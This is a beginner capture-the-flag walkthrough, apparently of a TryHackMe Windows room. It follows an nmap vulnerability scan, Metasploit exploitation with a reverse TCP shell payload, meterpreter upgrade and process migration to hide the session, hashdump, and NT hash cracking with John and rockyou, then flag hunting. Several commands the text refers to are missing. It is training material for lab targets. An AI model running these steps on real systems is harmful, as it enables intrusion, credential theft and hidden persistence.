An educational series on Windows exploitation for complete beginners. A walkthrough.
Task 1: Recon
We start our recon with scanning the target machine using Nmap.
How many ports are open with a port number under 1000?
If you run the scan with -A flag it will scan all the ports on the host and we only need port numbers < 1000. It would be better to just specify -p 1000 to scan the first 1000 ports.
What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08–067)
To get this answer I ran nmap script which scans for the vulnerabilities on the host.
nmap --script vuln
Task 2: Gain Access
(To do that, type the following command in the terminal:)
Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)
Show options and set the one required value. What is the name of this value? (All caps for submission)
Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:
set payload windows/x64/shell/reverse_tcp
With that done, run the exploit!
Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.
And we got the 🐚 😄
Task 3: Escalate
In this task we gotta figure out how to convert a shell to meterpreter shell in metasploit.
What is the name of the post module we will use?
Select this (use MODULE_PATH).
Show options, what option are we required to change?
And it makes sense, we’ve got a shell in the task 2 and we’ve set that session (session 1) to the background. So, we want to upgrade that shell session to a meterpreter session as it will give us some powerful commands to use on the exploited machine.
Set the required option, you may need to list all of the sessions to find your target here.
Run! If this doesn’t work, try completing the exploit from the previous task once more.
Once the meterpreter shell conversion completes, select that session for use.
Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command ‘shell’ and run ‘whoami’. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.
List all of the processes running via the ‘ps’ command. Just because we are system doesn’t mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).
Migrate to this process using the ‘migrate PROCESS_ID’ command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.
Normally you want to get persistence on the target machine and not flash your meterpreter shell among other processes. That’s why it is important to hide the meterpreter shell process by migrating (binding) it to another process.
Task 4: Cracking
Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
Copy this password hash to a file and research how to crack it. What is the cracked password?
There are multiple types/formats of hashes.
Pentestmonkey has a good cheat sheet for reference:
I’ve encountered the following problems using John the Ripper. These are not problems with the tool itself, but inherent problems with pentesting and password cracking in general.
Sometimes I stumble across hashes on a pentest, but don’t recognise the format, don’t know if it’s supported by john, or whether there are multiple “–format” options I should try.
The hashes you collect on a pentest sometimes need munging into a different format… but what’s the format john is expecting?
John will occasionally recognise your hashes as the wrong type (e.g. “Raw MD5″ as “LM DES”). This is inevitable because some hashes look identical.
Sometimes I gain access to a system, but can’t recall how to recover the password hashes for that particular application / OS
So when I first tried to run John with the default wordlist to crack the hash obtained earlier I got the following “hint”:
Also there was a hint from THM that the hash can be cracked using rockyou.txt wordlist.
So I copied all the files, the obtained hashes (saved in hashes.hash) and the wordlist which I renamed to john.lst (you don’t have to do this, but it was just more convenient to me) to the /tmp directory, ran john with the NT format, and got the cracked password for the user Jon:
john --format=NT --wordlist=john.lst hashes.hash
Task 5: Find flags!
Find the three flags planted on this machine. These are not traditional flags, rather, they’re meant to represent key locations within the Windows system. Use the hints provided below to complete this room!
Flag1? This flag can be found at the system root.
I switched meterpreter shell back to DOS shell, navigated to the disk C and found the first flag:
Flag2? This flag can be found at the location where passwords are stored within Windows.
Finding this flag was easy, there is a good command that allows you to search for files, since I already knew the exact name of the file I just specified it and got the exact location:
dir /b/s *.txt
flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.
And in the same fashion I easily obtained the third flag. To read the flag, use the following command: